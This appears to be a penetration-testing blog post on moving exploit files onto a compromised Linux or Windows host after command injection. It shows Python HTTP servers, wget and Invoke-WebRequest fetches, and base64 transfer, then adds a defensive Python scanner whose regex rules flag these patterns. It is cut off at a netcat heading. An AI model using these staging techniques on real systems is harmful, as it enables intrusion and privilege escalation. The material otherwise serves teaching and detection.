You’re sitting in a dark room; the only light is from your terminal, glowing on the wall behind you. You’ve just found a command injection vulnerability on a Fortune 500 company’s website. You’re looking at a minimum $5,000 bug bounty, and if you can successfully elevate privileges to root, you’ve just paid off your new car. You’ve just dropped into your shell and confirmed that you’re www-data. What next? You run uname -a to check the kernel version, and you see that the kernel is vulnerable to one of the most infamous exploits ever, CVE-2016-5195, Dirty Cow. Without proper terminal access via SSH, how can you transfer the file over?
Post Exploitation - File Transfer
Linux offers a wide variety of ways to transfer files, some more complex than others. Most of the methods here can make use of tools that are already present on the most popular Linux distros.
HTTP File Transfer
The simplest way of transferring files by far is hosting them on a web server. Fortunately, Python ships with a really handy module that lets you spawn an HTTP server on demand.
attacker:~# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
After hosting the file on your HTTP server (ensure that HTTP traffic is being forwarded on your network), you should be able to fetch it with wget or curl.
victim:~$ wget http://127.0.0.1/exploit.py
--2019-06-10 08:41:11--  http://127.0.0.1/exploit.py
Connecting to 127.0.0.1:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 34 [text/plain]
Saving to: ‘exploit.py.1’

exploit.py.1 100%[=================================================>] 34 --.-KB/s in 0s

2019-06-10 08:41:11 (1.57 MB/s) - ‘exploit.py’ saved [34/34]

victim:~$ ls
exploit.py
Or with curl, another command-line utility for sending web requests:
And, for fun, Invoke-WebRequest with PowerShell!
PS C:\Users\Victim> Invoke-WebRequest -Uri http://127.0.0.1/exploit.py -OutFile C:\Users\Victim\exploit.py
PS C:\Users\Victim> ls

    Directory: C:\Users\Victim

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
<output omitted>
-a----        6/10/2019   8:46 AM             34 exploit.py
As you can see, HTTP servers are a very powerful way of transferring files to both Windows and Linux boxes, but what if HTTP is blocked? Excellent question, reader. Thankfully, Base64 is another viable method!
This method works in both directions, for transferring files to the attacker and to the victim. On the attacking machine you’ll want to print the contents of the file and pipe that output to base64, which encodes the file as a single printable string.
attacker:~# cat exploit.py | base64
dGhpcyBpcyBhIHRlc3QgZmlsZQppZ25vcmUgbWUgcGxzCg==
On the victim, echo the encoded string, pipe it to base64 -d to decode it, and redirect the decoded output to a file.
victim:~$ echo "dGhpcyBpcyBhIHRlc3QgZmlsZQppZ25vcmUgbWUgcGxzCg==" | base64 -d >> exploit.py
I personally recommend keeping it as a one-liner due to formatting issues that may arise.
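Looking at the two methods above from the defender’s side, here is an added example (not from the original post) that scans collected command lines, such as shell history or a process-creation feed, for the exact patterns those sections describe: an HTTP fetch from a bare IP address with wget, curl or Invoke-WebRequest, base64 decoding redirected into a file, and an ad-hoc Python HTTP server. The command lines are constructed samples, and the rule names and the Finding type are my own.

```python
import re
from dataclasses import dataclass

# Constructed sample of executed command lines (not real logs), as a
# defender might collect them from shell history or an EDR process feed.
SAMPLE_COMMANDS = [
    "ls -la /var/www",
    "wget http://127.0.0.1/exploit.py",
    "curl -o /tmp/exploit.py http://203.0.113.5:8080/exploit.py",
    'echo "dGhpcyBpcyBhIHRlc3QgZmlsZQppZ25vcmUgbWUgcGxzCg==" | base64 -d >> exploit.py',
    "python -m SimpleHTTPServer 80",
    "base64 -d /etc/motd",   # decode without a file redirect: benign here
    "apt-get update",
]

# Rule names are assumed. Each regex mirrors one transfer technique from
# the text: the Python 3 module name http.server is included alongside the
# Python 2 SimpleHTTPServer shown above.
RULES = [
    ("http_fetch_from_ip",
     re.compile(r"\b(wget|curl|Invoke-WebRequest)\b.*https?://\d{1,3}(\.\d{1,3}){3}")),
    ("base64_decode_to_file",
     re.compile(r"\bbase64\s+(-d|--decode)\b.*>{1,2}\s*\S+")),
    ("adhoc_http_server",
     re.compile(r"python\d?\s+-m\s+(SimpleHTTPServer|http\.server)\b")),
]


@dataclass(frozen=True)
class Finding:
    rule: str
    command: str


def scan_commands(commands):
    """Return one Finding per (rule, command) pair that matches."""
    findings = []
    for cmd in commands:
        for name, pattern in RULES:
            if pattern.search(cmd):
                findings.append(Finding(name, cmd))
    return findings


def summarize(findings):
    """Count hits per rule for a quick triage view."""
    counts = {}
    for f in findings:
        counts[f.rule] = counts.get(f.rule, 0) + 1
    return counts


if __name__ == "__main__":
    for f in scan_commands(SAMPLE_COMMANDS):
        print(f"[{f.rule}] {f.command}")
```

A bare `base64 -d` with no redirect is deliberately not flagged, so the rules key on the decode-to-file shape rather than on base64 use alone.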
Netcat File Transfer